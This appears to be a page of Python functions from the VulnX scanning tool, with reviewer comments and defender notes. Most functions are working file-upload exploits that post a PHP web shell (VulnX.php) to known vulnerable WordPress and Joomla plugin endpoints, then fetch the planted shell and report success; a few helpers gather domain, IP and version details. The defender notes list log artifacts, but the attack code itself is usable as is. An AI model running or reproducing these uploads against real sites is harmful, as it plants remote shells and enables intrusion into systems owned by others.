Exemplo n.º 1
def webhosting_info(hostinfo):
    """Print domain-age and IP-geolocation details for the module-level ``url``.

    ``hostinfo`` is accepted but not used in this block. The host name is sent
    to input.payapi.io and the resolved address to ipinfo.io, so the name of
    the site under assessment is disclosed to both third-party services.
    """
    print(' %s Web Hosting Information' % run)
    age_reply = vxget(
        "https://input.payapi.io/v1/api/fraud/domain/age/" + hostd(url),
        headers, timeout)
    # Both groups are lazy, so group(1) holds only the text before a hyphen
    # (the year, if the service answers with a YYYY-MM-DD date - unconfirmed).
    created = re.compile(r'Date: (.+?)-(.+?)').search(age_reply)
    if created:
        print(' %s Domain Created on : %s' % (good, created.group(1)))
    address = socket.gethostbyname(hostd(url))
    # The label says CloudFlare, but this is simply whatever the resolver returned.
    print(' %s CloudFlare IP : %s' % (good, address))
    # NOTE(review): plain HTTP - the geolocation reply is not integrity protected.
    geo_reply = vxget("http://ipinfo.io/" + address + "/json", headers, timeout)
    # (pattern, output line) pairs, in the order the original printed them.
    lookups = (
        (r'country\": \"(.+?)\"', ' %s Country : %s'),
        (r'region\": \"(.+?)\"', ' %s Region : %s'),
        (r'latitude: (.+?)', ' %s Latitude : %s'),
        (r'longitude\": \"(.+?)\"', ' %s Longitude : %s'),
        (r'timezone\": \"(.+?)\"', ' %s Timezone : %s'),
        (r'ans\": \"(.+?)\"', ' %s Ans : %s'),
        (r'org\": \"(.+?)\"', ' %s Org : %s'),
    )
    # Run every search before printing anything, as the original did.
    hits = [(re.search(pattern, geo_reply), line) for pattern, line in lookups]
    for hit, line in hits:
        if hit:
            print(line % (good, hit.group(1)))
    print("-----------------------------------------------")
Exemplo n.º 2
def joomla_comjdownloads2(url, headers, timeout):
    """Check a Joomla site for a VulnX.php file in the jDownloads screenshots folder.

    The only request visible in this block is a GET for
    ``/images/jdownloads/screenshots/VulnX.php`` under ``url``. The outcome is
    printed and nothing is returned.

    Defender note: requests for that path, and a VulnX.php file inside the
    jdownloads screenshots directory, are the artifacts tied to this check.
    """
    # Mutates the caller's dict; the local name is rebound to a new dict below.
    headers[
        'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
    endpoint = url + "/images/jdownloads/screenshots/VulnX.php"
    headers = {"content-type": ["form-data"]}
    # Both handles are opened and never closed in this block.
    files = open('./shell/VulnX.zip', 'rb')
    shell = open('./shell/VulnX.gif', 'rb')
    # NOTE(review): this form dict is built but not passed to any call below.
    data = {
        'name': 'Tig',
        'mail': '*****@*****.**',
        'filetitle': 'Tig',
        'catlist': '1',
        'license': '0',
        'language': '0',
        'system': '0',
        'file_upload': files,
        'pic_upload': shell,
        'description': '<p>zot</p>',
        'senden': 'Send file',
        'option': 'com_jdownloads',
        'view': 'upload',
        'send': '1',
        '24c22896d6fe6977b731543b3e44c22f': '1'
    }
    response = vxget(endpoint, headers, timeout)
    # Matches the characters "200" anywhere in whatever vxget returned, so a
    # "vulnerable" line from this check is weak evidence on its own.
    if re.findall(r'200', response):
        print(' %s Com Jdownloads2       %s    %s' %
              (que, vulnexploit, endpoint))
    else:
        print(' %s Com Jdownloads2       %s' % (que, failexploit))
Exemplo n.º 3
def wp_wysija(url, headers, timeout, vulnresults):
    """Probe the Wysija Newsletters theme-upload action for arbitrary PHP upload.

    Posts the local file ./shell/VulnX.php to the plugin's ``themeupload``
    action, requests the location where it would be unpacked, and treats the
    text "Vuln X" in that reply as success. The outcome is printed and added
    to ``vulnresults``.

    Defender note: POSTs to admin-post.php with page=wysija_campaigns and any
    VulnX.php under wp-content/uploads/wysija/themes/ are the log and
    filesystem artifacts of this probe.
    """
    theme = "my-theme"  # not referenced again in this block
    endpoint = url + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes"
    shell = open('./shell/VulnX.php', 'rb')  # handle is never closed here

    field = "wpshop_file"  # not referenced again in this block
    # Both header writes mutate the dict the caller passed in.
    headers[
        'User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
    headers['Content_Type'] = 'form-data'
    options = {
        'theme': shell,
        'overwriteexistingtheme': 'on',
        'action': 'themeupload',
        'submitter': 'Upload'
    }
    # The POST result is stored but never inspected; only the follow-up GET decides.
    send_shell = vxpost(endpoint, options, headers, timeout)
    dump_data = url + "/wp-content/uploads/wysija/themes/VulnX/VulnX.php?Vuln=X"
    res = vxget(dump_data, headers, timeout)
    check_wysija = re.findall("Vuln X", res)
    if check_wysija:
        print(' %s Wysija Newsletters    %s    %s' %
              (que, vulnexploit, dump_data))
        vulnresults.add('[SUCCESS] Wysija Newsletters -- Shell:' + dump_data)
    else:
        print(' %s Wysija Newsletters    %s' % (que, failexploit))
        vulnresults.add('[FAILED] Wysija Newsletters')
Exemplo n.º 4
def wp_wysija(url, headers):
    """Probe the Wysija Newsletters theme-upload action for arbitrary PHP upload.

    Two-argument variant: the timeout passed to both requests is fixed at 3
    and the result is only printed. It posts ./shell/VulnX.php to the
    ``themeupload`` action and then looks for "Vuln X" at the expected path.

    Defender note: POSTs to admin-post.php with page=wysija_campaigns and any
    VulnX.php under wp-content/uploads/wysija/themes/ are the artifacts of
    this probe.
    """
    theme = "my-theme"  # not referenced again in this block
    endpoint = url + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes"
    shell = open('./shell/VulnX.php', 'rb')  # handle is never closed here

    field = "wpshop_file"  # not referenced again in this block
    # Both header writes mutate the dict the caller passed in.
    headers[
        'User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
    headers['Content_Type'] = 'form-data'
    options = {
        'theme': shell,
        'overwriteexistingtheme': 'on',
        'action': 'themeupload',
        'submitter': 'Upload'
    }
    # The POST result is stored but never inspected; only the follow-up GET decides.
    send_shell = vxpost(endpoint, options, headers, 3)
    dump_data = url + "/wp-content/uploads/wysija/themes/VulnX/VulnX.php?Vuln=X"
    res = vxget(dump_data, headers, 3)
    check_wysija = re.findall("Vuln X", res)
    if check_wysija:
        print('%s [%s+%s] Wysija Newsletters%s -------------- %s VULN%s' %
              (W, G, W, W, G, W))
        print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
              (G, W, B, W, dump_data, W))
    else:
        print('%s [%s-%s] Wysija Newsletters%s -------------- %s FAIL%s' %
              (W, R, W, W, R, W))
Exemplo n.º 5
def joomla_foxcontact(url, headers, timeout):
    """Send a text file to a Joomla upload endpoint and look for a marker afterwards.

    Posts ./shell/VulnX.txt as form field ``file``, then fetches a second URL
    and reports success when the text "Tig" appears in the reply. The outcome
    is printed and nothing is returned.

    NOTE(review): the function is named for Fox Contact, but the endpoint in
    use is the com_fabrik ``ajax_upload`` task; the Fox Contact paths survive
    only in the commented-out block below.

    Defender note: POSTs to index.php with option=com_fabrik and
    method=ajax_upload are the request artifact of this probe.
    """
    # Mutates the caller's dict; the local name is rebound to a new dict below.
    headers[
        'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'

    #    foxf = {'components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php',
    #            'index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php',
    #            'index.php?option=com_foxcontact&amp;view=loader&amp;type=uploader&amp;owner=module&amp;id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php',
    #            'components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php'}

    endpoint = url + "/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"

    headers = {"content-type": ["form-data"]}
    fieldname = 'file'
    shell = open('./shell/VulnX.txt', 'rb')  # handle is never closed here
    data = {
        fieldname: shell,
    }
    # The POST result is stored but never inspected.
    content = vxpost(endpoint, data, headers, timeout)
    # The check URL is the full endpoint string, query included, plus a file path.
    path_shell = endpoint + "/images/XAttacker.txt"
    response = vxget(path_shell, headers, timeout)
    # A positive only means "Tig" occurred somewhere in that reply.
    if re.findall(r'Tig', response):
        print(' %s Fox Contact            %s    %s' %
              (que, vulnexploit, path_shell))
    else:
        print(' %s fox Contact            %s' % (que, failexploit))
Exemplo n.º 6
def wp_showbiz(url, headers, timeout, vulnresults):
    """Probe the Showbiz Pro ``update_plugin`` AJAX action for arbitrary PHP upload.

    Posts ./shell/VulnX.php to /wp-admin/admin-ajax.php with
    action=showbiz_ajax_action, requests the plugin's temp/update_extract
    path, and treats "Vuln X" in that reply as success. The outcome is printed
    and added to ``vulnresults``.

    Defender note: admin-ajax.php POSTs carrying action=showbiz_ajax_action
    and any VulnX.php under wp-content/plugins/showbiz/temp/update_extract/
    are the artifacts of this probe. The User-Agent is picked at random from a
    fixed list, so it is not a stable indicator on its own.
    """
    endpoint = url + "/wp-admin/admin-ajax.php"

    # Nested helper: returns one entry of a hard-coded browser User-Agent list.
    def random_UserAgent():
        useragents_rotate = [
            "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
            "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0",
            "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
            "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
            "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"
        ]
        useragents_random = random.choice(useragents_rotate)
        return useragents_random

    useragent = random_UserAgent()
    # Both header writes mutate the dict the caller passed in.
    headers['User-Agent'] = useragent
    headers['Content_Type'] = 'multipart/form-data'
    options = {
        "action": "showbiz_ajax_action",
        "client_action": "update_plugin",
        # Handle is opened inline and never closed in this block.
        "update_file": [open('./shell/VulnX.php', 'rb')]
    }
    # The POST result is stored but never inspected.
    send_shell = vxpost(endpoint, options, headers, timeout)
    dump_data = url + "/wp-content/plugins/showbiz/temp/update_extract/VulnX.php?Vuln=X"
    # NOTE(review): the form dict is passed where the other vxget calls on this
    # page pass headers, and no timeout is given.
    res = vxget(dump_data, options)
    check_showbiz = re.findall("Vuln X", res)
    if check_showbiz:
        print(' %s Showbiz Pro           %s    %s' %
              (que, vulnexploit, dump_data))
        vulnresults.add('[SUCCESS] Showbiz Pro -- Shell:' + dump_data)
    else:
        print(' %s Showbiz Pro           %s' % (que, failexploit))
        vulnresults.add('[FAILED] Showbiz Pro')
Exemplo n.º 7
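def drupal_version():
    """Print the first "Drupal <digits>" string found in the target's front page.

    Fetches the module-level ``url`` through ``vxget`` and scans the reply.
    Nothing is printed when the pattern does not occur, and nothing is
    returned. The quantifier allows zero digits, so the bare word "Drupal "
    also counts as a match.

    The banner comes from page content the site controls, so it indicates a
    version rather than proving one.
    """
    response = vxget(url, headers, timeout)
    # Raw string: "\d" inside a plain literal is an invalid escape sequence
    # that newer Python releases warn about.
    matches = re.findall(r'Drupal \d{0,10}', response)
    # Every match begins with "Drupal ", so a non-empty list is the only
    # condition that needs checking.
    if matches:
        print('%s [+] Drupal Version : %s %s' % (G, matches[0], W))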
Exemplo n.º 8
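def prestashop_version():
    """Print the first "Prestashop <digits>" string found in the target's front page.

    Fetches the module-level ``url`` through ``vxget`` and scans ``.text`` of
    the reply. Nothing is printed when the pattern does not occur. The
    function always returns None.

    NOTE(review): this reads ``response.text``, while ``drupal_version`` on
    this page passes the ``vxget`` result straight to the regex - confirm
    which of the two matches what ``vxget`` returns.
    """
    response = vxget(url, headers, timeout)
    # Raw string: "\d" inside a plain literal is an invalid escape sequence
    # that newer Python releases warn about.
    matches = re.findall(r'Prestashop \d{0,9}', response.text)
    # Every match begins with "Prestashop ", so a non-empty list suffices.
    if matches:
        print('%s [+] Prestashop Version : %s %s' % (G, matches[0], W))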
Exemplo n.º 9
def webhosting_info():
    """Print domain-age and country/region details for the module-level ``url``.

    The host name is sent to input.payapi.io and the resolved address to
    ipinfo.io, so the name of the site under assessment is disclosed to both
    third-party services. Both requests use a fixed timeout argument of 3.
    """
    print('%s [~] Web Hosting Information %s' % (Y, W))
    age_reply = vxget(
        "https://input.payapi.io/v1/api/fraud/domain/age/" + hostd(url),
        headers, 3)
    # Both groups are lazy, so group(1) holds only the text before a hyphen
    # (the year, if the service answers with a YYYY-MM-DD date - unconfirmed).
    created = re.compile(r'Date: (.+?)-(.+?)').search(age_reply)
    if created:
        print('%s [*] Domain Created on : %s' % (B, created.group(1)))
    address = socket.gethostbyname(hostd(url))
    # The label says CloudFlare, but this is simply whatever the resolver returned.
    print('%s [*] CloudFlare IP : %s' % (B, address))
    # NOTE(review): plain HTTP - the geolocation reply is not integrity protected.
    geo_reply = vxget("http://ipinfo.io/" + address + "/json", headers, 3)
    country = re.compile(r'country\": \"(.+?)\"').search(geo_reply)
    region = re.compile(r'region\": \"(.+?)\"').search(geo_reply)
    for hit, line in ((country, '%s [*] Country : %s'),
                      (region, '%s [*] Region : %s')):
        if hit:
            print(line % (B, hit.group(1)))
Exemplo n.º 10
def wp_dm(url, headers, timeout, vulnresults):
    """Probe the Downloads Manager plugin's upload form for arbitrary PHP upload.

    Posts ./shell/VulnX.php as field ``upfile`` to ``url`` itself, requests
    the plugin's upload directory, and treats "Vuln X" in that reply as
    success. The outcome is printed and added to ``vulnresults``.

    Defender note: a VulnX.php file under
    wp-content/plugins/downloads-manager/upload/ and requests for it with
    ?Vuln=X are the artifacts of this probe.
    """
    # Annotation-only statement: nothing is stored in headers.
    headers['Content_Type']: 'multipart/form-data'
    # Handle is opened inline and never closed in this block.
    options = {'upfile': open('./shell/VulnX.php', 'rb'), 'dm_upload': ''}
    # The POST result is stored but never inspected.
    send_shell = vxpost(url, options, headers, timeout)
    dump_data = url + "/wp-content/plugins/downloads-manager/upload/VulnX.php?Vuln=X"
    content = vxget(dump_data, headers, timeout)
    check_dm = re.findall("Vuln X", content)
    if check_dm:
        print(' %s Download Manager      %s    %s' %
              (que, vulnexploit, dump_data))
        vulnresults.add('[SUCCESS] Download Manager -- Shell:' + dump_data)
    else:
        print(' %s Download Manager      %s' % (que, failexploit))
        vulnresults.add('[FAILED] Download Manager')
Exemplo n.º 11
def wp_dm(url, headers):
    """Probe the Downloads Manager plugin's upload form for arbitrary PHP upload.

    Two-argument variant: the timeout passed to both requests is fixed at 3
    and the result is only printed. It posts ./shell/VulnX.php as field
    ``upfile`` to ``url`` itself and then looks for "Vuln X" at the expected
    upload path.

    Defender note: a VulnX.php file under
    wp-content/plugins/downloads-manager/upload/ and requests for it with
    ?Vuln=X are the artifacts of this probe.
    """
    # Annotation-only statement: nothing is stored in headers.
    headers['Content_Type']: 'multipart/form-data'
    # Handle is opened inline and never closed in this block.
    options = {'upfile': open('./shell/VulnX.php', 'rb'), 'dm_upload': ''}
    # The POST result is stored but never inspected.
    send_shell = vxpost(url, options, headers, 3)
    dump_data = url + "/wp-content/plugins/downloads-manager/upload/VulnX.php?Vuln=X"
    content = vxget(dump_data, headers, 3)
    check_dm = re.findall("Vuln X", content)
    if check_dm:
        print('%s [%s+%s] Download Manager %s---- %s VULN%s' %
              (W, G, W, W, G, W))
        print('%s [*] Injected Successfully \n %s%s[*] Found ->%s %s %s' %
              (G, W, B, W, dump_data, W))
    else:
        print('%s [%s-%s] Download Manager %s --- %s FAIL%s' %
              (W, R, W, W, R, W))
Exemplo n.º 12
def wp_cherry(url, headers, timeout, vulnresults):
    """Probe the Cherry plugin's import-export uploader for arbitrary PHP upload.

    Posts ./shell/VulnX.php as field ``file`` to the plugin's upload.php,
    requests the same directory for VulnX.php, and treats "Vuln X" in that
    reply as success. The outcome is printed and added to ``vulnresults``.

    Defender note: POSTs to
    wp-content/plugins/cherry-plugin/admin/import-export/upload.php and a
    VulnX.php file in that directory are the artifacts of this probe.
    """
    # Annotation-only statement: nothing is stored in headers.
    headers['Content_Type']: 'multipart/form-data'
    # Handle is opened inline and never closed in this block.
    options = {'file': open('./shell/VulnX.php', 'rb')}
    endpoint = url + "/wp-content/plugins/cherry-plugin/admin/import-export/upload.php"
    # The POST result is stored but never inspected.
    response = vxpost(endpoint, options, headers, timeout)
    dump_data = url + "/wp-content/plugins/cherry-plugin/admin/import-export/VulnX.php?Vuln=X"
    content = vxget(dump_data, headers, timeout)
    check_cherry = re.findall("Vuln X", content)
    if check_cherry:
        print(' %s CherryFramework       %s    %s' %
              (que, vulnexploit, dump_data))
        vulnresults.add('[SUCCESS] CherryFramework -- Shell:' + dump_data)
    else:
        print(' %s CherryFramework       %s' % (que, failexploit))
        vulnresults.add('[FAILED] CherryFramework')
Exemplo n.º 13
def wp_cherry(url, headers):
    """Probe the Cherry plugin's import-export uploader for arbitrary PHP upload.

    Two-argument variant: the timeout passed to both requests is fixed at 3
    and the result is only printed. It posts ./shell/VulnX.php as field
    ``file`` to the plugin's upload.php and then looks for "Vuln X" in the
    same directory.

    Defender note: POSTs to
    wp-content/plugins/cherry-plugin/admin/import-export/upload.php and a
    VulnX.php file in that directory are the artifacts of this probe.
    """
    # Annotation-only statement: nothing is stored in headers.
    headers['Content_Type']: 'multipart/form-data'
    # Handle is opened inline and never closed in this block.
    options = {'file': open('./shell/VulnX.php', 'rb')}
    endpoint = url + "/wp-content/plugins/cherry-plugin/admin/import-export/upload.php"
    # The POST result is stored but never inspected.
    response = vxpost(endpoint, options, headers, 3)
    dump_data = url + "/wp-content/plugins/cherry-plugin/admin/import-export/VulnX.php?Vuln=X"
    content = vxget(dump_data, headers, 3)
    check_cherry = re.findall("Vuln X", content)
    if check_cherry:
        print('%s [%s+%s] CherryFramework%s ------------- %s VULN%s' %
              (W, G, W, W, G, W))
        print('%s [*]Shell Uploaded Successfully \n %s link : %s%s ' %
              (B, W, dump_data, W))
    else:
        print('%s [%s-%s] CherryFramework%s ------------- %s FAIL%s' %
              (W, R, W, W, R, W))
Exemplo n.º 14
def wp_adblockblocker(url,headers,timeout,vulnresults):
    """Probe the ``getcountryuser`` AJAX action for arbitrary PHP upload.

    Posts ./shell/VulnX.php as field ``popimg`` to admin-ajax.php, requests
    wp-content/uploads/<year>/<month>/VulnX.php, and treats "Vuln X" in that
    reply as success. ``year`` and ``month`` are read from outside this
    block. The outcome is printed and added to ``vulnresults``.

    Defender note: admin-ajax.php POSTs with action=getcountryuser and a
    VulnX.php file in a dated uploads folder are the artifacts of this probe.
    """
    endpoint = url + "/wp-admin/admin-ajax.php?action=getcountryuser&cs=2"
    shell = open('./shell/VulnX.php','rb')  # handle is never closed here
    # Mutates the dict the caller passed in.
    headers['Content_Type'] = 'multipart/form-data'
    options = {
            'popimg':shell,
    }
    # The POST result is stored but never inspected.
    send_shell = vxpost(endpoint,options,headers,timeout)
    dump_data = url + "/wp-content/uploads/"+year+"/"+month+"/VulnX.php?Vuln=X"
    res=vxget(dump_data, headers,timeout)
    if re.findall("Vuln X", res):
        print (' %s adblockblocker        %s    %s' %(que,vulnexploit,dump_data))
        vulnresults.add('[SUCCESS] adblockblocker -- Shell:' + dump_data)
    else:
        print (' %s adblockblocker        %s' %(que , failexploit))       
        vulnresults.add('[FAILED] adblockblocker')
Exemplo n.º 15
def wp_adsmanager(url, headers, timeout, vulnresults):
    """Probe Simple Ads Manager's ``upload_ad_image`` action for arbitrary PHP upload.

    Posts ./shell/VulnX.php as field ``uploadfile`` to sam-ajax-admin.php,
    then requests VulnX.php in the plugin directory. Unlike the sibling checks
    on this page, success is decided by the JSON text {"status":"success"}
    appearing in the GET reply. The outcome is printed and added to
    ``vulnresults``.

    Defender note: POSTs to
    wp-content/plugins/simple-ads-manager/sam-ajax-admin.php with
    action=upload_ad_image and a VulnX.php file in that plugin directory are
    the artifacts of this probe.
    """
    endpoint = url + "/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php"
    shell = open('./shell/VulnX.php', 'rb')  # handle is never closed here
    field = "wpshop_file"  # not referenced again in this block
    # Mutates the dict the caller passed in.
    headers['Content_Type'] = 'multipart/form-data'
    options = {'uploadfile': shell, 'action': 'upload_ad_image', 'path': ''}
    # The POST result is stored but never inspected.
    send_shell = vxpost(endpoint, options, headers, timeout)
    dump_data = url + "/wp-content/plugins/simple-ads-manager/VulnX.php?Vuln=X/"
    res = vxget(dump_data, headers, timeout)
    check_adsmanager = re.findall("{\"status\":\"success\"}", res)
    if check_adsmanager:
        print(' %s Simple Ads Manager    %s    %s' %
              (que, vulnexploit, dump_data))
        vulnresults.add('[SUCCESS] Simple Ads Manager -- Shell:' + dump_data)
    else:
        print(' %s Simple Ads Manager    %s' % (que, failexploit))
        vulnresults.add('[FAILED] Simple Ads Manager')
Exemplo n.º 16
def wp_shop(url, headers, timeout, vulnresults):
    """Probe the WPshop ``ajaxUpload`` handler for arbitrary PHP upload.

    Posts ./shell/VulnX.php as field ``wpshop_file`` to the plugin's ajax.php,
    requests wp-content/uploads/VulnX.php, and treats "Vuln X" in that reply
    as success. The outcome is printed and added to ``vulnresults``.

    Defender note: POSTs to wp-content/plugins/wpshop/includes/ajax.php with
    elementCode=ajaxUpload and a VulnX.php file directly under
    wp-content/uploads/ are the artifacts of this probe.
    """
    endpoint = url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload"
    shell = open('./shell/VulnX.php', 'rb')  # handle is never closed here
    field = "wpshop_file"
    # Mutates the dict the caller passed in.
    headers['Content_Type'] = 'multipart/form-data'
    options = {field: shell}
    # The POST result is stored but never inspected.
    send_shell = vxpost(endpoint, options, headers, timeout)
    dump_data = url + "/wp-content/uploads/VulnX.php?Vuln=X"
    res = vxget(dump_data, headers, timeout)
    check_shop = re.findall("Vuln X", res)
    if check_shop:
        print(' %s WPshop eCommerce      %s    %s' %
              (que, vulnexploit, dump_data))
        vulnresults.add('[SUCCESS] WPshop eCommerce -- Shell:' + dump_data)
    else:
        print(' %s WPshop eCommerce      %s' % (que, failexploit))
        vulnresults.add('[FAILED] WPshop eCommerce')
Exemplo n.º 17
def wp_inboundiomarketing(url,headers,timeout,vulnresults):
    """Probe the InBoundio Marketing CSV uploader for arbitrary PHP upload.

    Posts ./shell/VulnX.php as field ``file`` to csv_uploader.php, requests
    the plugin's uploaded_csv directory for VulnX.php, and treats "Vuln X" in
    that reply as success. The outcome is printed and added to
    ``vulnresults``.

    Defender note: POSTs to
    wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php and
    a VulnX.php file in the uploaded_csv folder are the artifacts of this
    probe.
    """
    endpoint = url + "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php"
    shell = open('./shell/VulnX.php','rb')  # handle is never closed here
    # Mutates the dict the caller passed in.
    headers['Content_Type'] = 'multipart/form-data'
    options = {
            'file':shell,
    }
    # The POST result is stored but never inspected.
    send_shell = vxpost(endpoint,options,headers,timeout)
    dump_data = url + "/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/VulnX.php?Vuln=X"
    res=vxget(dump_data, headers,timeout)
    # Variable name is left over from the Wysija check; it holds this plugin's result.
    check_wysija = re.findall("Vuln X", res)
    if check_wysija:
        print (' %s InBoundio Marketing   %s    %s' %(que,vulnexploit,dump_data))
        vulnresults.add('[SUCCESS] InBoundio Marketing -- Shell:' + dump_data)
    else:
        print (' %s InBoundio Marketing   %s' %(que , failexploit))       
        vulnresults.add('[FAILED] InBoundio Marketing')
Exemplo n.º 18
def wp_adblockblocker(url, headers):
    """Probe the ``getcountryuser`` AJAX action for arbitrary PHP upload.

    Two-argument variant: the timeout passed to both requests is fixed at 3
    and the result is only printed. It posts ./shell/VulnX.php as field
    ``popimg`` to admin-ajax.php and then looks for "Vuln X" at
    wp-content/uploads/<year>/<month>/VulnX.php. ``year`` and ``month`` are
    read from outside this block.

    Defender note: admin-ajax.php POSTs with action=getcountryuser and a
    VulnX.php file in a dated uploads folder are the artifacts of this probe.
    """
    endpoint = url + "/wp-admin/admin-ajax.php?action=getcountryuser&cs=2"
    shell = open('./shell/VulnX.php', 'rb')  # handle is never closed here
    # Mutates the dict the caller passed in.
    headers['Content_Type'] = 'multipart/form-data'
    options = {
        'popimg': shell,
    }
    # The POST result is stored but never inspected.
    send_shell = vxpost(endpoint, options, headers, 3)
    dump_data = url + "/wp-content/uploads/" + year + "/" + month + "/VulnX.php?Vuln=X"
    res = vxget(dump_data, headers, 3)
    if re.findall("Vuln X", res):
        print('%s [%s+%s] adblockblocker%s ------- %s VULN%s' %
              (W, G, W, W, G, W))
        print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
              (G, W, B, W, dump_data, W))
    else:
        print('%s [%s-%s] adblockblocker%s ------- %s FAIL%s' %
              (W, R, W, W, R, W))
Exemplo n.º 19
def wp_shop(url, headers):
    """Probe the WPshop ``ajaxUpload`` handler for arbitrary PHP upload.

    Two-argument variant: the timeout passed to both requests is fixed at 3
    and the result is only printed. It posts ./shell/VulnX.php as field
    ``wpshop_file`` to the plugin's ajax.php and then looks for "Vuln X" at
    wp-content/uploads/VulnX.php.

    Defender note: POSTs to wp-content/plugins/wpshop/includes/ajax.php with
    elementCode=ajaxUpload and a VulnX.php file directly under
    wp-content/uploads/ are the artifacts of this probe.
    """
    endpoint = url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload"
    shell = open('./shell/VulnX.php', 'rb')  # handle is never closed here
    field = "wpshop_file"
    # Mutates the dict the caller passed in.
    headers['Content_Type'] = 'multipart/form-data'
    options = {field: shell}
    # The POST result is stored but never inspected.
    send_shell = vxpost(endpoint, options, headers, 3)
    dump_data = url + "/wp-content/uploads/VulnX.php?Vuln=X"
    res = vxget(dump_data, headers, 3)
    check_shop = re.findall("Vuln X", res)
    if check_shop:
        print('%s [%s+%s] WPshop eCommerce%s ------------- %s VULN%s' %
              (W, G, W, W, G, W))
        print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
              (G, W, B, W, dump_data, W))
    else:
        print('%s [%s-%s] WPshop eCommerce%s ------------- %s FAIL%s' %
              (W, R, W, W, R, W))
Exemplo n.º 20
def wp_adsmanager(url, headers):
    """Probe Simple Ads Manager's ``upload_ad_image`` action for arbitrary PHP upload.

    Two-argument variant: the timeout passed to both requests is fixed at 3
    and the result is only printed. It posts ./shell/VulnX.php as field
    ``uploadfile`` to sam-ajax-admin.php, then requests VulnX.php in the
    plugin directory and looks for the JSON text {"status":"success"} in the
    GET reply.

    Defender note: POSTs to
    wp-content/plugins/simple-ads-manager/sam-ajax-admin.php with
    action=upload_ad_image and a VulnX.php file in that plugin directory are
    the artifacts of this probe.
    """
    endpoint = url + "/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php"
    shell = open('./shell/VulnX.php', 'rb')  # handle is never closed here
    field = "wpshop_file"  # not referenced again in this block
    # Mutates the dict the caller passed in.
    headers['Content_Type'] = 'multipart/form-data'
    options = {'uploadfile': shell, 'action': 'upload_ad_image', 'path': ''}
    # The POST result is stored but never inspected.
    send_shell = vxpost(endpoint, options, headers, 3)
    dump_data = url + "/wp-content/plugins/simple-ads-manager/VulnX.php?Vuln=X/"
    res = vxget(dump_data, headers, 3)
    check_adsmanager = re.findall("{\"status\":\"success\"}", res)
    if check_adsmanager:
        print('%s [%s+%s] Simple Ads Manager%s -------- %s VULN%s' %
              (W, G, W, W, G, W))
        print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
              (G, W, B, W, dump_data, W))
    else:
        print('%s [%s-%s] Simple Ads Manager%s -------- %s FAIL%s' %
              (W, R, W, W, R, W))
Exemplo n.º 21
def domain_info():
    """Print the domains and first IP that pagesinventory.com lists for ``url``.

    The module-level ``url`` is appended to the search query as-is (no URL
    encoding) and is therefore disclosed to that third-party service. Results
    are scraped from the returned HTML with two regular expressions.
    """
    print('%s [~] Search for SubDomains %s' % (Y, W))
    page = vxget("https://www.pagesinventory.com/search/?s=" + url, headers, 3)
    # Scrape the domain and IP links out of the result table.
    domain_hits = re.compile(r'<td><a href=\"\/domain\/(.*?).html\">').findall(page)
    ip_hits = re.compile(r'<a href=\"/ip\/(.*?).html\">').findall(page)
    # Drop repeats while keeping first-seen order.
    domains = list(dict.fromkeys(domain_hits))
    print('%s [*] SubDomains : %s %s' %
          (B, " \n [*] SubDomains : ".join(domains), W))
    # Only the first IP link is reported, and only when it is non-empty.
    if ip_hits and ip_hits[0]:
        print('%s [*] IP : %s %s' % (B, ip_hits[0], W))
Exemplo n.º 22
def joomla_comedia(url, headers, timeout):
    """Send a text file to Joomla's com_media images view and look for a marker.

    Posts ./shell/VulnX.txt as form field ``Filedata[]``, then fetches a
    second URL and reports success when the text "Tig" appears in the reply.
    The outcome is printed and nothing is returned.

    Defender note: POSTs to index.php with option=com_media and view=images
    are the request artifact of this probe.
    """
    # Mutates the caller's dict; the local name is rebound to a new dict below.
    headers[
        'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
    endpoint = url + "/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder="

    headers = {"content-type": ["form-data"]}
    fieldname = 'Filedata[]'
    shell = open('./shell/VulnX.txt', 'rb')  # handle is never closed here
    data = {
        fieldname: shell,
    }
    # The POST result is stored but never inspected.
    content = vxpost(endpoint, data, headers, timeout)
    # The check URL is the full endpoint string, query included, plus a file path.
    path_shell = endpoint + "/images/XAttacker.txt"
    response = vxget(path_shell, headers, timeout)
